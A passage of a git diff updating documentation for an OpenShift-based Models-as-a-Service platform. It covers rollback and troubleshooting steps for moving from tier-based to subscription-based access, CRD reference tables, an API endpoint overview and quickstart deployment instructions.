+kubectl delete maasauthpolicy,maassubscription -n models-as-a-service -l migration.maas.opendatahub.io/generated=true
+
+# Option C: Delete resources from a specific tier migration
+kubectl delete maasmodelref -n llm -l migration.maas.opendatahub.io/from-tier=premium
+kubectl delete maasauthpolicy,maassubscription -n models-as-a-service -l migration.maas.opendatahub.io/from-tier=premium
+
+# 3. Re-apply old gateway-auth-policy (if it was backed up)
+if [ -f migration-backup/gateway-auth-policy.yaml ]; then
+  kubectl apply -f migration-backup/gateway-auth-policy.yaml
+  echo "Restored gateway-auth-policy"
+else
+  echo "No gateway-auth-policy backup found (skipping restore)"
+fi
+
+# 4. Re-apply old TokenRateLimitPolicy (if backed up)
+if [ -f migration-backup/gateway-rate-limits.yaml ]; then
+  kubectl apply -f migration-backup/gateway-rate-limits.yaml
+  echo "Restored gateway-rate-limits"
+else
+  echo "No gateway-rate-limits backup found (skipping restore)"
+fi
+
+# 5. Re-add tier annotations to models
+kubectl annotate llminferenceservice my-model-name -n llm \
+  alpha.maas.opendatahub.io/tiers='["premium","enterprise"]' \
+  --overwrite
+
+# 6. Re-apply tier-to-group-mapping ConfigMap (if backed up)
+if [ -f migration-backup/tier-to-group-mapping.yaml ]; then
+  kubectl apply -f migration-backup/tier-to-group-mapping.yaml
+  echo "Restored tier-to-group-mapping"
+else
+  echo "No tier-to-group-mapping backup found (skipping restore)"
+fi
+
+# 7. Restart MaaS API to reload tier configuration
+kubectl rollout restart deployment/maas-api -n opendatahub
+```
+
+### Rollback Validation
+
+```bash
+# Test tier-based system is working
+# Using secure token file (see Phase 3 security warning for details)
+mkdir -p ~/.kube/tokens && chmod 700 ~/.kube/tokens
+oc whoami -t > ~/.kube/tokens/current && chmod 600 ~/.kube/tokens/current
+
+HOST="maas.$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')"
+
+curl -H "Authorization: Bearer $(cat ~/.kube/tokens/current)" \
+  "https://${HOST}/llm/my-model-name/v1/chat/completions" \
+  -H "Content-Type: application/json" \
+  -d '{"model":"my-model-name","messages":[{"role":"user","content":"test"}],"max_tokens":10}'
+
+# Expected: 200 OK (tier-based system restored)
+
+# Clean up token file
+rm -f ~/.kube/tokens/current
+```
+
+### Partial Rollback
+
+If only some models have issues, you can rollback specific models:
+
+```bash
+# Delete MaaS CRs for specific model only
+kubectl delete maasmodelref my-model-name -n llm
+kubectl delete maasauthpolicy my-model-premium-access -n models-as-a-service
+kubectl delete maassubscription my-model-premium-subscription -n models-as-a-service
+
+# Re-add tier annotation to that model
+kubectl annotate llminferenceservice my-model-name -n llm \
+  alpha.maas.opendatahub.io/tiers='["premium","enterprise"]' \
+  --overwrite
+```
+
+## Troubleshooting
+
+### Models return 401 Unauthorized
+
+**Symptom:** Models return 401 after migration
+
+**Possible Causes:**
+- No MaaSAuthPolicy exists for the model
+- User not authenticated
+- gateway-default-auth denying request
+
+**Resolution:**
+```bash
+# Check if MaaSAuthPolicy exists for the model
+kubectl get maasauthpolicy -n models-as-a-service -o json | \
+  jq -r '.items[] | select(.spec.modelRefs[]? | .name? == "my-model-name")'
+
+# Check if AuthPolicy was generated
+kubectl get authpolicy -n llm -l maas.opendatahub.io/model=my-model-name
+
+# Check AuthPolicy status
+kubectl describe authpolicy -n llm <policy-name>
+
+# Verify user is authenticated
+oc whoami
+```
+
+### Models return 403 Forbidden
+
+**Symptom:** Models return 403 after migration
+
+**Possible Causes:**
+- User's groups not in MaaSAuthPolicy subjects
+- AuthPolicy not enforced yet
+
+**Resolution:**
+```bash
+# Check user's groups
+oc whoami --show-groups
+
+# Check MaaSAuthPolicy groups
+kubectl get maasauthpolicy my-model-premium-access -n models-as-a-service -o yaml
+
+# Verify groups match
+kubectl get maasauthpolicy my-model-premium-access -n models-as-a-service -o jsonpath='{.spec.subjects.groups[*].name}'
+
+# Check AuthPolicy enforcement
+kubectl get authpolicy -n llm -o jsonpath='{.items[*].status.conditions[?(@.type=="Enforced")].status}'
+
+# Check Authorino logs
+kubectl logs -n openshift-ingress -l app.kubernetes.io/name=authorino --tail=50
+```
+
+### Models return 429 Too Many Requests
+
+**Symptom:** Models immediately return 429 even on first request
+
+**Possible Causes:**
+- No MaaSSubscription exists for the model
+- User's groups not in MaaSSubscription owner groups
+- TokenRateLimitPolicy not configured correctly
+
+**Resolution:**
+```bash
+# Check if MaaSSubscription exists for the model
+kubectl get maassubscription -n models-as-a-service -o json | \
+  jq -r '.items[] | select(.spec.modelRefs[]? | .name? == "my-model-name")'
+
+# Check if TokenRateLimitPolicy was generated
+kubectl get tokenratelimitpolicy -n llm -l maas.opendatahub.io/model=my-model-name
+
+# Check TokenRateLimitPolicy status
+kubectl describe tokenratelimitpolicy -n llm <policy-name>
+
+# Verify user's groups match subscription owner groups
+oc whoami --show-groups
+kubectl get maassubscription my-model-premium-subscription -n models-as-a-service -o jsonpath='{.spec.owner.groups[*].name}'
+
+# Check Limitador logs
+kubectl logs -n kuadrant-system -l app.kubernetes.io/name=limitador --tail=50
+```
+
+### maas-controller not creating policies
+
+**Symptom:** MaaSModelRef shows Ready but no AuthPolicy/TokenRateLimitPolicy created
+
+**Possible Causes:**
+- maas-controller not watching correct namespace
+- Controller reconciliation failed
+- HTTPRoute not found
+
+**Resolution:**
+```bash
+# Check maas-controller logs
+kubectl logs -n opendatahub -l app=maas-controller --tail=100
+
+# Check MaaSModelRef status
+kubectl get maasmodelref my-model-name -n llm -o yaml
+
+# Verify HTTPRoute exists
+kubectl get httproute -n llm my-model-name
+
+# Check subscription namespace matches controller config
+kubectl get deployment maas-controller -n opendatahub -o jsonpath='{.spec.template.spec.containers[0].env[?(@.name=="MAAS_SUBSCRIPTION_NAMESPACE")].value}'
+
+# Manually trigger reconciliation by updating MaaSAuthPolicy
+kubectl annotate maasauthpolicy my-model-premium-access -n models-as-a-service \
+  reconcile-trigger="$(date +%s)" --overwrite
+```
+
+### MaaSModelRef shows Pending or Failed
+
+**Symptom:** MaaSModelRef status.phase is Pending or Failed
+
+**Possible Causes:**
+- LLMInferenceService not ready
+- HTTPRoute not created by KServe yet
+- Model namespace mismatch
+
+**Resolution:**
+```bash
+# Check MaaSModelRef status
+kubectl describe maasmodelref my-model-name -n llm
+
+# Check LLMInferenceService status
+kubectl get llminferenceservice my-model-name -n llm -o yaml
+
+# Check if HTTPRoute exists
+kubectl get httproute -n llm my-model-name
+
+# Wait for KServe to create HTTPRoute
+kubectl wait --for=condition=Ready llminferenceservice/my-model-name -n llm --timeout=5m
+
+# Check maas-controller logs for errors
+kubectl logs -n opendatahub -l app=maas-controller | grep my-model-name
+```
+
+### Duplicate AuthPolicies (ODH Model Controller conflict)
+
+**Symptom:** Multiple AuthPolicies targeting the same HTTPRoute
+
+**Possible Causes:**
+- Both ODH Model Controller and maas-controller creating AuthPolicies
+- Policy ownership conflict
+
+**Resolution:**
+```bash
+# Check for multiple AuthPolicies on same route
+kubectl get authpolicy -n llm -o json | \
+  jq -r '.items[] | select(.spec.targetRef.name=="my-model-name") | .metadata.name'
+
+# Check managed-by labels
+kubectl get authpolicy -n llm -o json | \
+  jq -r '.items[] | "\(.metadata.name): \(.metadata.labels."app.kubernetes.io/managed-by")"'
+
+# Opt out ODH management
+kubectl annotate authpolicy <odh-policy-name> -n llm \
+  opendatahub.io/managed=false
+
+# Or delete ODH-managed policy (maas-controller will recreate)
+kubectl delete authpolicy <odh-policy-name> -n llm
+```
+
+### ConfigMap changes not reflected
+
+**Symptom:** Updated tier-to-group-mapping not taking effect
+
+**Note:** After migration, tier-to-group-mapping ConfigMap is no longer used by the subscription model.
+
+**Resolution:**
+- Update MaaSAuthPolicy and MaaSSubscription CRs instead of ConfigMap
+- ConfigMap is only used if you haven't migrated yet
+
+```bash
+# Update MaaSAuthPolicy groups
+kubectl edit maasauthpolicy my-model-premium-access -n models-as-a-service
+
+# Update MaaSSubscription owner groups and limits
+kubectl edit maassubscription my-model-premium-subscription -n models-as-a-service
+```
+
+## Frequently Asked Questions
+
+### Do I need to use API keys with the new subscription model?
+
+**No.** The new subscription model works with OpenShift tokens by default. The `gateway-default-auth` and per-route AuthPolicies use `kubernetesTokenReview` for authentication.
+
+API key support is optional and requires additional MaaS API configuration. The migration guide assumes you continue using OpenShift token authentication.
+
+### Can I have different rate limits for the same model?
+
+**Yes.** Create multiple MaaSSubscriptions for the same model with different owner groups and token limits.
+
+Example:
+```yaml
+# Basic tier: 100 tokens/min
+---
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSSubscription
+metadata:
+  name: my-model-basic-subscription
+  namespace: models-as-a-service
+spec:
+  owner:
+    groups:
+      - name: basic-users
+  modelRefs:
+    - name: my-model
+      namespace: llm
+      tokenRateLimits:
+        - limit: 100
+          window: 1m
+
+# Premium tier: 10000 tokens/min
+---
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSSubscription
+metadata:
+  name: my-model-premium-subscription
+  namespace: models-as-a-service
+spec:
+  owner:
+    groups:
+      - name: premium-users
+  modelRefs:
+    - name: my-model
+      namespace: llm
+      tokenRateLimits:
+        - limit: 10000
+          window: 1m
+```
+
+When a user belongs to multiple owner groups, the controller selects the subscription with the **highest token rate limit**. In this example, users in both groups get the premium subscription with 10000 tokens/min (higher than the basic subscription's 100 tokens/min).
+
+### What happens to users during migration?
+
+**With zero-downtime approach:** Users experience no interruption. The old tier-based system remains active until you validate and switch to the new system.
+
+**With full cutover:** Users may experience brief interruption during the maintenance window.
+
+### Do I need to restart MaaS API?
+
+**No.** MaaS API is unchanged. Only the tier lookup endpoint (`/v1/tiers/lookup`) becomes unused after migration.
+
+If you delete the `tier-to-group-mapping` ConfigMap, MaaS API will no longer serve tier information, but this doesn't require a restart.
+
+### Can I migrate one model at a time?
+
+**Yes.** You can migrate models incrementally:
+
+1. Create MaaS CRs for one model
+2. Test and validate
+3. Remove tier annotation from that model
+4. Repeat for next model
+
+This allows gradual migration with minimal risk.
+
+### What if a user is in multiple groups with different subscriptions?
+
+When a user belongs to multiple owner groups with different subscriptions for the same model, the controller selects the subscription with the **highest token rate limit** (the subscription with the highest `limit` value wins).
+
+**Example:** A user in both `basic-users` and `premium-users` groups:
+- If `basic-subscription` has 100 tokens/min and `premium-subscription` has 10000 tokens/min, the user gets the premium subscription with 10000 tokens/min (highest limit wins).
+- If both subscriptions have the same token rate limit, the controller uses an implementation-defined tie-breaker (not guaranteed to be stable).
+
+> **Note:** The `spec.priority` field exists in the MaaSSubscription CRD but is currently not used by the controller. Selection is based solely on token rate limit.
+
+### Can I still use the tier-to-group-mapping ConfigMap?
+
+**During migration:** Yes, both systems can coexist.
+
+**After migration:** The ConfigMap is no longer used by the subscription model. You can:
+- Delete it if not needed
+- Keep it if MaaS API uses it for other features (check API documentation)
+- Annotate it as deprecated
+
+### How do I know which models a tier has access to?
+
+In the old system, check the `alpha.maas.opendatahub.io/tiers` annotation on each LLMInferenceService:
+
+```bash
+kubectl get llminferenceservice -n llm -o json | \
+  jq -r '.items[] | "\(.metadata.name): \(.metadata.annotations."alpha.maas.opendatahub.io/tiers")"'
+```
+
+In the new system, check MaaSAuthPolicy:
+
+```bash
+kubectl get maasauthpolicy -n models-as-a-service -o json | \
+  jq -r '.items[] | "\(.metadata.name): \(.spec.modelRefs[])"'
+```
+
+### What happens if I don't create a MaaSSubscription for a model?
+
+Users with access (via MaaSAuthPolicy) will get **429 Too Many Requests** immediately because:
+
+1. The per-route AuthPolicy allows them (auth passes)
+2. No per-route TokenRateLimitPolicy exists for them
+3. gateway-default-deny kicks in with 0 token limit
+
+This is the "dual-gate" model: both auth AND subscription must pass.
+
+### Can I use the subscription model without MaaSAuthPolicy?
+
+**No.** Without MaaSAuthPolicy, no per-route AuthPolicy is created, so `gateway-default-auth` denies all requests (401/403).
+
+You must create both MaaSAuthPolicy (for access) and MaaSSubscription (for rate limits).
+
+### How do I grant access to all authenticated users?
+
+Use the `system:authenticated` group:
+
+```yaml
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSAuthPolicy
+metadata:
+  name: public-model-access
+  namespace: models-as-a-service
+spec:
+  modelRefs:
+    - name: public-model
+      namespace: llm
+  subjects:
+    groups:
+      - name: system:authenticated
+    users: []
+```
+
+This is equivalent to the old tier system's `free` tier with `system:authenticated` group.
+
+## Additional Resources
+
+- [Old vs New Flow Documentation](https://github.com/opendatahub-io/models-as-a-service/blob/main/maas-controller/docs/old-vs-new-flow.md)
+- [MaaS Controller README](https://github.com/opendatahub-io/models-as-a-service/blob/main/maas-controller/README.md)
+- [Deployment Guide](../quickstart.md)
+
+## Support
+
+For issues or questions:
+1. Check the troubleshooting section above
+2. Review [MaaS Controller logs](#troubleshooting)
+3. Consult the [old-vs-new-flow.md](https://github.com/opendatahub-io/models-as-a-service/blob/main/maas-controller/docs/old-vs-new-flow.md) for architectural details
+4. Open an issue on GitHub with migration logs and error messages
diff --git a/docs/content/quickstart.md b/docs/content/quickstart.md
index 9760048d5..b0c8757c3 100644
--- a/docs/content/quickstart.md
+++ b/docs/content/quickstart.md
@@ -3,7 +3,7 @@
 This guide provides quickstart instructions for deploying the MaaS Platform infrastructure.
 
 !!! note
-    For more detailed instructions, please refer to [Installation under the Administrator Guide](install/prerequisites.md).
+    For more detailed instructions, please refer to [Installation under the Install Guide](install/prerequisites.md).
 
 ## Prerequisites
 
@@ -32,31 +32,54 @@ Before deploying MaaS, Authorino's listener TLS must be enabled. This is a platf
 For step-by-step commands, see [TLS Configuration: Authorino TLS Configuration](configuration-and-management/tls-configuration.md#authorino-tls-configuration).
 
 !!! tip "Automated configuration"
-    The `deploy-rhoai-stable.sh` script automatically configures all remaining TLS settings after deployment, including Gateway TLS bootstrap and Authorino → maas-api outbound TLS.
+    The `deploy.sh` script automatically configures all remaining TLS settings after deployment, including Gateway TLS bootstrap and Authorino → maas-api outbound TLS.
 
 ## Quick Start
 
-### Automated OpenShift Deployment (Recommended)
+### Automated OpenShift Deployment
 
-For OpenShift clusters, use the unified automated deployment script:
+For OpenShift clusters, use the unified automated deployment script. Choose your deployment method:
 
-```bash
-export MAAS_REF="main"  # Use the latest release tag, or "main" for development
+=== "Operator (Recommended)"
 
-# Deploy using RHOAI operator (default)
-./scripts/deploy.sh
+    Deploy MaaS through the RHOAI or ODH operator. This is the recommended approach for production deployments.
 
-# Or deploy using ODH operator
-./scripts/deploy.sh --operator-type odh
+    ```bash
+    export MAAS_REF="main"  # Use the latest release tag, or "main" for development
 
-# Or deploy using kustomize
-./scripts/deploy.sh --deployment-mode kustomize
-```
+    # Deploy using RHOAI operator (default)
+    ./scripts/deploy.sh
+
+    # Or deploy using ODH operator
+    ./scripts/deploy.sh --operator-type odh
+    ```
+
+    !!! note "Using Release Tags"
+        The `MAAS_REF` environment variable should reference a release tag (e.g., `v1.0.0`) for production deployments.
+        The release workflow automatically updates all `MAAS_REF="main"` references in documentation and scripts
+        to use the new release tag when a release is created. Use `"main"` only for development/testing.
+
+=== "Kustomize (Development Only)"
+
+    !!! warning "Development Use Only"
+        Kustomize deployment is intended for **development and testing purposes only**. For production deployments, use the Operator install tab above instead.
 
-!!! note "Using Release Tags"
-    The `MAAS_REF` environment variable should reference a release tag (e.g., `v1.0.0`) for production deployments.
-    The release workflow automatically updates all `MAAS_REF="main"` references in documentation and scripts
-    to use the new release tag when a release is created. Use `"main"` only for development/testing.
+    !!! note "Prerequisites: Run hack scripts first"
+        Before deploying with kustomize, you must run the two hack scripts to install cert-manager, LeaderWorkerSet (LWS), and the ODH operator. Run them in order:
+
+        1. **cert-manager and LWS**: `./.github/hack/install-cert-manager-and-lws.sh`
+        2. **ODH operator**: `./.github/hack/install-odh.sh`
+
+    ```bash
+    export MAAS_REF="main"  # Use the latest release tag, or "main" for development
+
+    ./scripts/deploy.sh --deployment-mode kustomize
+    ```
+
+    !!! note "Using Release Tags"
+        The `MAAS_REF` environment variable should reference a release tag (e.g., `v1.0.0`) for production deployments.
+        The release workflow automatically updates all `MAAS_REF="main"` references in documentation and scripts
+        to use the new release tag when a release is created. Use `"main"` only for development/testing.
 
 
 ### Verify Deployment
@@ -103,79 +126,6 @@ kubectl get pods -n redhat-ods-applications
 
 For detailed validation and troubleshooting, see the [Validation Guide](install/validation.md).
 
-## Model Setup
-
-!!! note
-    At least one model must be deployed to validate the installation using the [Validation Guide](install/validation.md).
-
-### Deploy Sample Models
-
-#### Simulator Model (CPU)
-
-A lightweight mock service for testing that generates responses without running an actual language model.
-
-```bash
-PROJECT_DIR=$(git rev-parse --show-toplevel)
-kustomize build ${PROJECT_DIR}/docs/samples/models/simulator/ | kubectl apply -f -
-```
-
-#### Facebook OPT-125M Model (CPU)
-
-An inference deployment that loads and runs a 125M parameter model without the need for a GPU.
-
-```bash
-PROJECT_DIR=$(git rev-parse --show-toplevel)
-kustomize build ${PROJECT_DIR}/docs/samples/models/facebook-opt-125m-cpu/ | kubectl apply -f -
-```
-
-#### Qwen3 Model (GPU Required)
-
-⚠️ This model requires GPU nodes with `nvidia.com/gpu` resources available in your cluster.
-
-```bash
-PROJECT_DIR=$(git rev-parse --show-toplevel)
-kustomize build ${PROJECT_DIR}/docs/samples/models/qwen3/ | kubectl apply -f -
-```
-
-#### Verify Model Deployment
-
-```bash
-# Check LLMInferenceService status
-kubectl get llminferenceservices -n llm
-
-# Check pods
-kubectl get pods -n llm
-```
-
-#### Update Existing Models (Optional)
-
-To update an existing model, modify the `LLMInferenceService` to use the newly created `maas-default-gateway` gateway.
-
-```bash
-kubectl patch llminferenceservice my-production-model -n llm --type='json' -p='[
-  {
-    "op": "add",
-    "path": "/spec/gateway/refs/-",
-    "value": {
-      "name": "maas-default-gateway",
-      "namespace": "openshift-ingress"
-    }
-  }
-]'
-```
-
-```yaml
-apiVersion: serving.kserve.io/v1alpha1
-kind: LLMInferenceService
-metadata:
-  name: my-production-model
-spec:
-  gateway:
-    refs:
-      - name: maas-default-gateway
-        namespace: openshift-ingress
-```
-
 ## Next Steps
 
-After installation, proceed to [Validation](install/validation.md) to test and verify your deployment.
+After deployment, proceed to [Model Setup (On Cluster)](install/model-setup.md) to deploy sample models, then [Validation](install/validation.md) to test and verify your deployment.
diff --git a/docs/content/reference/api-reference.md b/docs/content/reference/api-reference.md
new file mode 100644
index 000000000..1ff5827f2
--- /dev/null
+++ b/docs/content/reference/api-reference.md
@@ -0,0 +1,4 @@
+<swagger-ui src="../api/openapi3.yaml"/>
+
+!!! note "Display issues"
+    If the interactive API documentation above does not fully load (endpoints, schemas, or "Try it out" are missing), reload the page to display it correctly.
diff --git a/docs/content/reference/crds/external-model.md b/docs/content/reference/crds/external-model.md
new file mode 100644
index 000000000..6ca3291cc
--- /dev/null
+++ b/docs/content/reference/crds/external-model.md
@@ -0,0 +1,68 @@
+# ExternalModel
+
+Defines an external AI/ML model hosted outside the cluster (e.g., OpenAI, Anthropic, Azure OpenAI). The ExternalModel CRD contains provider details, endpoint URL, and credential references that were previously inlined in MaaSModelRef.
+
+## ExternalModelSpec
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| provider | string | Yes | Provider identifier (e.g., `openai`, `anthropic`, `azure`). Max length: 63 characters. |
+| endpoint | string | Yes | FQDN of the external provider (no scheme or path), e.g., `api.openai.com`. This is metadata for downstream consumers. Max length: 253 characters. |
+| credentialRef | CredentialReference | Yes | Reference to the Secret containing API credentials. Must exist in the same namespace as the ExternalModel. |
+
+## CredentialReference
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| name | string | Yes | Name of the Secret containing the credentials. Must be in the same namespace as the ExternalModel. Max length: 253 characters. |
+
+## ExternalModelStatus
+
+| Field | Type | Description |
+|-------|------|-------------|
+| phase | string | One of: `Pending`, `Ready`, `Failed` |
+| conditions | []Condition | Latest observations of the external model's state |
+
+## Example
+
+```yaml
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: ExternalModel
+metadata:
+  name: gpt4
+  namespace: models
+spec:
+  provider: openai
+  endpoint: api.openai.com
+  credentialRef:
+    name: openai-credentials
+---
+apiVersion: v1
+kind: Secret
+metadata:
+  name: openai-credentials
+  namespace: models
+type: Opaque
+stringData:
+  api-key: "sk-..."
+---
+# MaaSModelRef referencing the ExternalModel
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: gpt4-model
+  namespace: models
+spec:
+  modelRef:
+    kind: ExternalModel
+    name: gpt4
+```
+
+## Relationship with MaaSModelRef
+
+ExternalModel is a dedicated CRD for external model configuration. MaaSModelRef references ExternalModel by name using `spec.modelRef.kind: ExternalModel` and `spec.modelRef.name: <external-model-name>`.
+
+This separation allows:
+- **Reusability**: One ExternalModel can be referenced by multiple MaaSModelRefs
+- **Clean separation**: Provider-specific configuration lives in ExternalModel; MaaSModelRef handles listing and access control
+- **Extensibility**: Adding new external providers requires no MaaSModelRef schema changes
diff --git a/docs/content/reference/crds/maas-auth-policy.md b/docs/content/reference/crds/maas-auth-policy.md
new file mode 100644
index 000000000..936096c35
--- /dev/null
+++ b/docs/content/reference/crds/maas-auth-policy.md
@@ -0,0 +1,33 @@
+# MaaSAuthPolicy
+
+Defines who (groups/users) can access which models. Creates Kuadrant AuthPolicies that validate API keys via MaaS API callback and perform subscription selection. Must be created in the `models-as-a-service` namespace.
+
+## MaaSAuthPolicySpec
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| modelRefs | []ModelRef | Yes | List of `{name, namespace}` references to MaaSModelRef resources |
+| subjects | SubjectSpec | Yes | Who has access (OR logic—any match grants access) |
+| meteringMetadata | MeteringMetadata | No | Billing and tracking information |
+
+## SubjectSpec
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| groups | []GroupReference | No | List of Kubernetes group names |
+| users | []string | No | List of Kubernetes user names |
+
+At least one of `groups` or `users` must be specified.
+
+## ModelRef (modelRefs item)
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| name | string | Yes | Name of the MaaSModelRef |
+| namespace | string | Yes | Namespace where the MaaSModelRef lives |
+
+## GroupReference
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| name | string | Yes | Name of the group |
diff --git a/docs/content/reference/crds/maas-model-ref.md b/docs/content/reference/crds/maas-model-ref.md
new file mode 100644
index 000000000..b6b326cd9
--- /dev/null
+++ b/docs/content/reference/crds/maas-model-ref.md
@@ -0,0 +1,28 @@
+# MaaSModelRef
+
+Identifies an AI/ML model on the cluster. Create MaaSModelRef in the **same namespace** as the backend (`LLMInferenceService`, `ExternalModel`, etc.). The MaaS API lists models from MaaSModelRef resources cluster-wide (using `status.endpoint` and `status.phase`).
+
+## MaaSModelRefSpec
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| modelRef | ModelReference | Yes | Reference to the model endpoint |
+
+## ModelReference
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| kind | string | Yes | One of: `LLMInferenceService`, `ExternalModel` |
+| name | string | Yes | Name of the model resource (e.g. LLMInferenceService name, ExternalModel name). Must be in the same namespace as the MaaSModelRef. Max length: 253 characters. |
+
+For `kind: ExternalModel`, the MaaSModelRef references an [ExternalModel](external-model.md) CR that contains the provider configuration.
+
+## MaaSModelRefStatus
+
+| Field | Type | Description |
+|-------|------|-------------|
+| phase | string | One of: `Pending`, `Ready`, `Unhealthy`, `Failed` |
+| endpoint | string | Endpoint URL for the model |
+| httpRouteName | string | Name of the HTTPRoute associated with this model |
+| httpRouteNamespace | string | Namespace of the HTTPRoute |
+| conditions | []Condition | Latest observations of the model's state |
diff --git a/docs/content/reference/crds/maas-subscription.md b/docs/content/reference/crds/maas-subscription.md
new file mode 100644
index 000000000..775311b75
--- /dev/null
+++ b/docs/content/reference/crds/maas-subscription.md
@@ -0,0 +1,36 @@
+# MaaSSubscription
+
+Defines a subscription plan with per-model token rate limits. Creates Kuadrant TokenRateLimitPolicies enforced by Limitador. Must be created in the `models-as-a-service` namespace.
+
+## MaaSSubscriptionSpec
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| owner | OwnerSpec | Yes | Who owns this subscription |
+| modelRefs | []ModelSubscriptionRef | Yes | Models included with per-model token rate limits (each specifies `name` and `namespace`) |
+| tokenMetadata | TokenMetadata | No | Metadata for token attribution and metering |
+| priority | int32 | No | Subscription priority when user has multiple (higher = higher priority; default: 0) |
+
+## OwnerSpec
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| groups | []GroupReference | No | Kubernetes group names that own this subscription |
+| users | []string | No | Kubernetes user names that own this subscription |
+
+## ModelSubscriptionRef
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| name | string | Yes | Name of the MaaSModelRef |
+| namespace | string | Yes | Namespace where the MaaSModelRef lives |
+| tokenRateLimits | []TokenRateLimit | No | Token-based rate limits for this model |
+| tokenRateLimitRef | string | No | Reference to an existing TokenRateLimit resource |
+| billingRate | BillingRate | No | Cost per token |
+
+## TokenRateLimit
+
+| Field | Type | Required | Description |
+|-------|------|----------|-------------|
+| limit | int64 | Yes | Maximum number of tokens allowed |
+| window | string | Yes | Time window (e.g., `1m`, `1h`, `24h`). Pattern: `^(\d+)(s|m|h|d)$` |
diff --git a/docs/content/reference/maas-api-overview.md b/docs/content/reference/maas-api-overview.md
new file mode 100644
index 000000000..b339f006d
--- /dev/null
+++ b/docs/content/reference/maas-api-overview.md
@@ -0,0 +1,64 @@
+# MaaS API Overview
+
+This page provides a high-level overview of the MaaS API endpoints. For full request/response schemas and interactive documentation, see [MaaS API (Swagger)](api-reference.md).
+
+## Authentication
+
+All endpoints except `/health` require authentication via the `Authorization: Bearer <token>` header. Use either:
+
+- **OpenShift token** — from `oc whoami -t` for interactive use
+- **API key** — created via `POST /v1/api-keys` for programmatic access
+
+---
+
+## Endpoints by Category
+
+### Health
+
+| Method | Path | Description |
+|--------|------|-------------|
+| GET | `/health` | Health check. No authentication required. Used by load balancers and monitoring. |
+
+### Models
+
+| Method | Path | Description |
+|--------|------|-------------|
+| GET | `/v1/models` | List available LLMs in OpenAI-compatible format. Returns models the authenticated user can access. |
+
+### Tiers (Legacy)
+
+| Method | Path | Description |
+|--------|------|-------------|
+| POST | `/v1/tiers/lookup` | Look up the highest subscription tier for a set of groups. Used by tier-based access control. |
+
+!!! note "Subscription model"
+    The subscription-based architecture (MaaSAuthPolicy, MaaSSubscription) is the current approach. The tiers endpoint is retained for backward compatibility with tier-based deployments.
+
+### API Keys
+
+| Method | Path | Description |
+|--------|------|-------------|
+| POST | `/v1/api-keys` | Create a new API key. Returns plaintext key **once**; only the hash is stored. Optional body field `subscription` selects the MaaSSubscription; if omitted, the highest-priority accessible subscription is used. |
+| POST | `/v1/api-keys/search` | Search and filter API keys with pagination, sorting, and status filters. |
+| GET | `/v1/api-keys/{id}` | Get metadata for a specific API key. |
+| DELETE | `/v1/api-keys/{id}` | Revoke a specific API key. |
+| POST | `/v1/api-keys/bulk-revoke` | Revoke all active API keys for a user. Admins can revoke any user's keys. |
+
+---
+
+## Base URL
+
+The MaaS API is typically exposed under a path prefix, for example:
+
+- `https://maas.example.com/maas-api`
+- `https://<cluster-domain>/maas-api`
+
+Use the base URL appropriate for your deployment when calling these endpoints.
+
+---
+
+## Next Steps
+
+- **[MaaS API (Swagger)](api-reference.md)** — Interactive API documentation with full schemas and "Try it out"
+- **[Token Management](../configuration-and-management/token-management.md)** — How to create and use API keys
+- **[Self-Service Model Access](../user-guide/self-service-model-access.md)** — End-user guide for getting an API key and calling models
diff --git a/docs/content/release-notes/index.md b/docs/content/release-notes/index.md
new file mode 100644
index 000000000..b608aeacb
--- /dev/null
+++ b/docs/content/release-notes/index.md
@@ -0,0 +1,7 @@
+# Release Notes
+
+## v0.1.0
+
+*Initial release.*
+
+<!-- Add release notes for v0.1.0 here -->
diff --git a/docs/content/user-guide/self-service-model-access.md b/docs/content/user-guide/self-service-model-access.md
index 5392c596b..70eeeb3b1 100644
--- a/docs/content/user-guide/self-service-model-access.md
+++ b/docs/content/user-guide/self-service-model-access.md
@@ -6,10 +6,10 @@ This guide is for **end users** who want to use AI models through the MaaS platf
 
 The Models-as-a-Service (MaaS) platform provides access to AI models through a simple API. Your organization's administrator has set up the platform and configured access for your team.
 
-## Getting Your Access Token
+## Getting Your API Key
 
 !!! tip
-    For a detailed explanation of how token authentication works, including the underlying service account architecture and security model, see [Understanding Token Management](../configuration-and-management/token-management.md).
+    For a detailed explanation of how API key authentication works, including the underlying architecture and security model, see [Understanding Token Management](../configuration-and-management/token-management.md).
 
 ### Step 1: Get Your OpenShift Authentication Token
 
@@ -23,43 +23,53 @@ oc login ...
 OC_TOKEN=$(oc whoami -t)
 ```
 
-### Step 2: Request an Access Token from the API
+### Step 2: Create an API Key
 
-Next, use that OpenShift token to call the maas-api `/v1/tokens` endpoint. You can specify the desired expiration time; the default is 4 hours.
+Use your OpenShift token to create an API key via the maas-api `/v1/api-keys` endpoint. You can create permanent keys (omit `expiresIn`) or expiring keys.
+
+- Optional `subscription`: MaaSSubscription resource name to bind to this key. If you omit it, the platform picks your **highest-priority** accessible subscription (`spec.priority`).
+- The response includes `subscription`: the bound name (same flow whether you set it explicitly or not).
 
 ```bash
 CLUSTER_DOMAIN=$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')
 MAAS_API_URL="https://maas.${CLUSTER_DOMAIN}"
 
-TOKEN_RESPONSE=$(curl -sSk \
+API_KEY_RESPONSE=$(curl -sSk \
   -H "Authorization: Bearer ${OC_TOKEN}" \
   -H "Content-Type: application/json" \
   -X POST \
-  -d '{"expiration": "15m"}' \
-  "${MAAS_API_URL}/maas-api/v1/tokens")
+  -d '{"name": "my-api-key", "description": "Key for model access", "expiresIn": "90d", "subscription": "simulator-subscription"}' \
